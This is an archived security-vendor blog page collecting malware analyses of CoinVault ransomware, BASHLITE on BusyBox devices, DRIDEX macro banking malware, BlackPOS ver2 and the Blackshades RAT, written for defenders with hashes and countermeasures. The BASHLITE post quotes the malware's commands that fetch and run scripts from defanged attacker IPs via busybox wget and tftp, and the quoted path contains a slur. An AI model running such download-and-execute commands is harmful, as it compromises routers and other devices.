Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    September 2015
    S M T W T F S
    « Aug    
  • Email Subscription

  • About Us

    Author Archive - Rhena Inocencio (Threat Response Engineer)

    We have continuously monitored crypto-ransomware’s modifications and evolution since its discovery in late 2013. Though crypto-ransomware  is still relatively “new” to the threat landscape, it has already established itself as a formidable threat to unsuspecting users. By definition, crypto-ransomware shares similar routines with cryptolocker, a refinement of ransomware with file-encryption capabilities.

    We recently came across two variants of crypto-ransomware, each with a routine or feature not found in other variants. The discovery of these two variants proves that crypto-ransomware is still continuing its evolution—all to victimize users.

    The Newly Minted Threat, CoinVault

    CoinVault, or TROJ_CRYPTCOIN.AK stands out from other variants because it offers users a rare opportunity: the chance to save one encrypted file. The malware enters systems via automatic download from malicious websites or an infected flash drive. Once inside the system, CoinVault is able to gather information, connect to certain websites, and encrypt files.

    After encrypting files in an infected system, CoinVault displays a message telling the user that they can select one file to be decrypted, free of charge.

    Figure 1. Images displayed by CoinVault in the infected system

    Figure 2. (L): TROJ_CRYPTCOIN.AK or CoinVault ransom message,
    (R) TROJ_CRITOLOCK.A ransom message

    Read the rest of this entry »

    Posted in Malware | Comments Off on CoinVault Ransomware Jumps on Freemium Model

    When news of the Shellshock vulnerability broke out at the end of September, we spotted several attacks that leveraged the said vulnerability, thus manifesting the prevalence or even evolution on how attackers used the exploit. For instance, attackers used Shellshock to target SMTP servers, launch botnet attacks, and even to download KAITEN source code among others.

    We have continuously monitored this vulnerability and on our latest research, we observed that recent samples of BASHLITE (detected by Trend Micro as ELF_BASHLITE.SMB) scans the network for devices/machines running on BusyBox, and logs in using a set of usernames and passwords (see figure 4 below). Once a connection is established, it runs the command to download and run and scripts, gaining control over the Busybox system.

    BusyBox is built on top of the Linux kernel and used by small devices such as routers. Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive. This is seen in the following commands:

    cd /tmp
    busybox wget http://69[.]163[.]37[.]115/.niggers/
    busybox tftp -r -g 69[.1]63[.]37[.]115
    echo -e ‘\\x62\\x69\\x6e\\x66\\x61\\x67\\x74’\r\n

    cd /tmp/
    busybox wget http://176[.]10[.]250[.]37/.niggers/
    busybox tftp -r -g 176[.]10[.]250[.]37
    echo -e ‘\\x62\\x69\\x6e\\x66\\x61\\x67\\x74’\r\n

    This means that the malware can do the following commands on the affected devices:

    1. Change to the temporary folder where generally there is file write access
    2. Download a remote file, depending on whether the shell script is hosted via HTTP or TFTP.  There is ‘fail-safe’ mechanism to achieve its download routine. This means that if in the first command, it doesn’t execute any file, it will try again to connect to the URL and download the file.
    3. Run the downloaded shell script.
    4. Perform previous “fingerprinting” routine, to check if the device runs on BusyBox.

    Figure 1. Code snippets of BASHLITE downloading files via BusyBox

    The previous BASHLITE sample (detected as ELF_BASHLITE.A) used BusyBox just to echo the string ‘gayfgt‘ if the remote malicious user invokes the command SCANNER ON:

    Figure 2. Scanner mode ‘ON’

    Figure 3. Code snippet of ELF_BASHLITE.A where the string, ‘gayfgt’ is represented in octal form

    This is done to check if the device runs BusyBox, however it does not execute any commands (unlike the new samples). BASHLITE attempts to log into the remote systems by using the default set of usernames and passwords:

    Figure 4. Set of usernames and passwords

    User Impact and Countermeasures

    Devices running on BusyBox can be possibly affected by BASHLITE. As such, a remote attacker can issue commands or download other files on the devices thus compromising its security.  Since the initial discovery of Shellshock vulnerability, Trend Micro has provided protection via Deep Security rules and Smart Protection Network that detects the exploit and all related malware payload.

    We strongly advised users to change the default usernames and passwords and disable remote shell if possible to these devices. For more information on Shellshock vulnerability, you can read our Summary of Shellshock-Related Stories and Materials. Users can also get free protection from Shellshock via these tools.

    The following hashes are related to this threat:

    • ffaa3c714ae82f954089f49828dac795327bf26e
    • e51ad7cc8de05dc7991e591ee2f4eb53b8f05ae4
    • 82e47cdbedeef6812ea84549ffc2f385a03e57de
    • fd5c0f7575e6aa1f9cea5bb3977d6e037bfe6421

    With additional insights from Joseph Cepe

    Posted in Internet of Things, Malware, Vulnerabilities | Comments Off on BASHLITE Affects Devices Running on BusyBox

    Included in our predictions for the upcoming year is that more severe online banking and other financially-motivated threats will arise. It seems that we didn’t have to wait for 2015 to see proof of this prediction. We recently came across banking malware that features new techniques to cast a wider net for victims and avoid detection. This malware, known as DRIDEX, is being touted as the successor of the banking malware CRIDEX.

    The appearance of DRIDEX comes a couple of years after CRIDEX’s entry in the threat landscape. Both CRIDEX and DRIDEX steal personal information, specifically related data to online banking. DRIDEX is considered as the successor because it uses a new way to steal information—via HTML injections.

    However, there is a major difference between the two. CRIDEX malware is one of the payloads associated with exploit kit spam attacks. DRIDEX, on the other hand, relies on spam to deliver Microsoft Word documents containing malicious macro code. The macro code downloads DRIDEX onto the affected system.

    The DRIDEX Infection Chain

    As mentioned, DRIDEX arrives via spammed messages. The messages, supposedly sent by legitimate companies, talk about matters related to finance. The attachments are often said to be invoices or accounting documents.

    Figure 1. Sample spammed message

    The attachment is a Word document containing the malicious macro code. Should the user open the document, they might see a blank document. We have seen other attachments stating that the content will not be visible unless the macro feature is enabled—which is disabled by default. Once this feature is enabled, the macro downloads DRIDEX malware, specifically TSPY_DRIDEX.WQJ, onto the computer.

    Figure 2. Malicious attachment instructing users to enable the macro feature

    Once executed, the malware then monitors for activity related to online banking. Its configuration file contains a list of banks, most of which are based in Europe. Some of the targeted banks include:

    • Bank of Scotland
    • Lloyds Bank
    • Danske Bank
    • Barclays
    • Kasikorn Bank
    • Santander
    • Triodos Bank

    It then performs information theft through methods like form grabbing, screenshots, and site injections.

    Macros Versus Exploit Kits

    The use of macros is a marked departure from CRIDEX’s infection chain, which relies on the Blackhole Exploit Kit.  The move to macros could be seen as one way of ensuring a higher chance of successful attacks.

    Attacks using exploit kits rely on vulnerabilities in order to be successful. If the affected system is not vulnerable, the attack will not be successful. Meanwhile, macros are commonly used in automated and interactive documents. If the macro feature was already enabled prior to the attack, the attack commences without any additional requirements. Otherwise, the attack must use a strong social engineering lure in order to convince the user to enable the feature.

    The reliance on social engineering could be seen as one advantage of macro spam. In exploit kit spam, if the system is no longer vulnerable, the possibility of a successful attack dwindles to nothing, even if it was able to trick the user into click the malicious link. In a macro spam attack, there is always that possibility that the user will be tricked into enabling the macro feature.

    The use of macros also poses challenges for detection because of the insertion of garbage/useless code.

    Figure 3. Garbage code found in DRIDEX malware

    Affected Countries

    Based on feedback from the Smart Protection Network, users from Australia are the most affected by DRIDEX, followed by users in the U.K. and the U.S.

    Figure 4. Top affected countries, based on data from September-October 2014

    We traced the spam sending to several countries. The top ten spam sending countries include Vietnam, India, Taiwan, Korea, and China.

    Figure 5. Top DRIDEX spam sending countries

    Best Practices

    Macro-based attacks were popular in the early 2000s but they appear to be experiencing a revival these days. This just shows that “newer” attacks can come in the form of old techniques, which can be successful especially if victims are not aware of these older techniques. For macro-based attacks, it’s best to make sure to enable the macro security features in Office applications. For organizations, IT administrators can enforce such security measures via Group Policy settings.

    It might be tempting to open emails that are related to finances but users should avoid opening such emails until they can confirm the legitimacy of the email. These attacks rely on social engineering for success so exercising some caution can mean the difference between protection and infection.

    Trend Micro, through the Smart Protection Network, protects users from all threats related to this attack. Our Web Reputation Service, which tracks the credibility and safety of web domains, blocks access to malicious URLs. The Email Reputation Service scans emails and blocks those that contain spam-like and malicious content, including links and attachments. Meanwhile, our File Reputation Service checks the reputation of files against our database and flags those that contain malicious and suspicious behavior.

    The following are the related hashes for the said attack:

    DRIDEX malware:

    • C2C980297D985C0E62E461B76FA584E79A6B3822
    • 4DAD1A0E024CCE9C3A11622B5E5BBE3EFBEFC4B9
    • CBD005DB36EFBDF3AEED5D26FAD54554CD734DA4
    • BDC7C47001852A8E915F29EAEBCF99FFA857C3B5
    • B4F4B426457124ECFEEC4D5B59B9C2A6C25BAAF7
    • B54B06E01C6F735E98D17B156EE8C7A2437B2D68
    • BF1FCA6F81B3D5A9054CEAB9A56C58F248560B34

    Malicious .DOC files:

    • A7B1A30386928E6320C31279B3473610E0E96192
    • 01EEB1DEBB21DC8933E7B6C1280F7E3F87A88DD0
    • 0F9C49E08683B811A6C713AFC1A37B3A33F58FD8
    • F3A65B6828BEE8DA06DAEB1619B9F1265C4C38C7
    • AE6FE7D7E80D7271B902A482D1ECE2A73F082EBA
    • 46FF15B415407BABB60BECC19D259752C2BE77CD
    • 911A77E67ABABC355A2AA169149DE88480AB1768
    • 7714F4D42C7B1608BE281CB288C07BAF8FF35501

    With additional insight from Joie Salvio.

    Posted in Malware | Comments Off on Banking Trojan DRIDEX Uses Macros for Infection

    We recently spotted a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A.  In 2012, the source code of BlackPOS was leaked, enabling other cybercriminals and attackers to enhance its code.  What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems. This routine is different from previous PoS malware such as TSPY_POCARDL.U and TSPY_POCARDL.AB (BlackPOS) that employed the targeted company’s own installed service.

    The malware can be run with options: -[start|stop|install|uninstall]. The –install option installs the malware with service name =<AV_Company> Framework Management Instrumentation, and the –uninstall option deletes the said service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service.

    Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes.

    It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip.

    The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store, Target last December 2013.



    Figure 1. CreateToolhelp32Snapshot to enumerate processes

    Based on our analysis, this PoS malware uses a new custom search routine to check the RAM for Track data. These custom search routines have replaced the regex search in newer PoS malware. It samples 0x20000h bytes [the 0x and h implies hex bytes] in each pass, and continues scanning till it has scanned the entire memory region of the process being inspected.


    Figure 2. Screenshot of reading process memory


    Figure 3. Logging of data

    It has an exclusion list that functions to ignore certain processes where track data  is not found. It gathers track data by scanning the memory of the all running processes except for the following:

    • smss.exe
    • csrss.exe
    • wininit.exe
    • services.exe
    • lsass.exe
    • svchost.exe
    • winlogon.exe
    • sched.exe
    • spoolsv.exe
    • System
    • conhost.exe
    • ctfmon.exe
    • wmiprvse.exe
    • mdm.exe
    • taskmgr.exe
    • explorer.exe
    • RegSrvc.exe
    • firefox.exe
    • chrome.exe

    This skipping of scanning specific processes is similar to VSkimmer (detected as BKDR_HESETOX.CC).

    In TSPY_MEMLOG.A, the grabbed credit card Track data from memory is saved into a file McTrayErrorLogging.dll and sent to a shared location within the same network. We’ve seen this routine with another BlackPOS/Kaptoxa detected as TSPY_POCARDL.AB. However, the only difference is that TSPY_MEMLOG.A uses a batch file for moving the gathered data within the shared network while TSPY_POCARDL.AB executes the net command via cmd.exe. It is highly possible that the server is compromised since the malware uses a specific username for logging into the domain.

    Data Exfiltration Mechanism

    The malware drops the component t.bat which is responsible for transferring the data from McTrayErrorLogging.dll to a specific location in the network, t:\temp\dotnet\NDP45-KB2737084-x86.exe. It uses the following command to transfer the gathered data:


    Figure 4. Screenshot of command used to transfer data

    The “net use” command was used to connect from one machine to another machine’s drive. It uses a specific username to login to the domain above (IP address). It will open device t: on drive D.

    In one the biggest data breach we’ve seen in 2013, the cybercriminals behind it, offloaded the gathered data to a compromised server first while a different malware running on the compromised server uploaded it to the FTP. We surmise that this new BlackPOS malware uses the same exfiltration tactic.


    PoS malware can possibly arrive on the affected network via the following means:

    • Targeting specific servers by point of entry and lateral movement
    • Hacking network communication
    • Infect machine before deployment

    As such, we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware. For more information on PoS malware, read our white paper, Point-of-Sale System Breaches: Threats to the Retail and Hospitality Industries.

    Trend Micro protects enterprises from threats like PoS malware by detecting the malicious file.

    The related hash to this threat is  b57c5b49dab6bbd9f4c464d396414685.

    With additional analysis from Numaan Huq

    Update as of 9:44 AM, September 8, 2014

    During the course of our investigation, we spotted the following anti-American messages embedded in the binary:


    Figure 5. Screenshot of the messages embedded in the binary

    (Click image above to enlarge)

    Note that these are not used anywhere in the code and we surmise that these may be like a signature used by the group developing this malware.

    Update as of 2:27 PM, September 11, 2014

    Even though BlackPOS ver2 has an entirely different code compared to the BlackPOS which compromised Target, it duplicates the data exfiltration technique used by the Target BlackPOS. It is an improved clone of the original, which is why we decided to call this BlackPOS ver2.

    It is also being reported in the press that some security vendors called this malware as “FrameworkPOS.”  This is a play of the service name <AV_Company> Framework Management Instrumentation with which the malware installs itself.

    Posted in Malware | Comments Off on New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts

    Earlier this week the US government announced the arrest of more than 100 individuals linked to the Blackshades remote access Trojan (RAT). While most of those arrested were merely users of this RAT, the arrests included its co-creator, a 24-year-old Swede named Alex Yücel. Also arrested was a 23-year-old American named Brendan Johnston, who was involved in marketing the RAT to various hacker forums and provided support to “customers”.

    Blackshades was sold as a toolkit, which was used to create the actual malware, detected as WORM_SWISYN.SM. The actual capabilities of the malware itself are fairly similar to other RATs: it can steal keystrokes and passwords, launch denial-of-service attacks, and download and run malware onto the affected system. It can also be configured by the attacker to spread via USB drives, if desired.

    Blackshades, however, is particularly infamous for being used by would-be stalkers and other such unsavory elements to spy on women. Blackshades allows the remote attacker to turn on the victim PC’s microphone and/or webcam. It’s not the first malware family to include this behavior, but it appears to be one of Blackshade’s most commonly used “features”.


    Figure 1. The Blackshades remote access trojan’s UI

    The scale of the arrests—rarely have so many cybercriminals been arrested in one go—is entirely due to Blackshades’ ease of use. It was easy to acquire; it had its own easily accessible website with its own domain (now seized by the FBI).

    There were relatively few barriers to entry— in contrast with, say, the Russian underground, where it is not always easy to earn the trust of would-be sellers of malware. The damage the users of Blackshades caused was real, but that was not necessarily because they were particularly skillful.

    This was both good and bad. The relative lack of skill (and caution) by Blackshades users not only meant that law enforcement was able to apprehend them, but it also means that the barriers to entry are sufficiently low that anyone can now be a cybercriminal should one want to do so.

    This case should serve as a warning to all would-be low level cybercriminals: law enforcement has the capability and willingness to go after cybercriminals of all capabilities and skills, and you are not too far from the long arms of the law.

    Trend Micro protects users from this threat by detecting the created RATs, as well as blocking the main site that sold Blackshades.


    Posted in Malware | Comments Off on The Blackshades RAT – Entry-Level Cybercrime


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice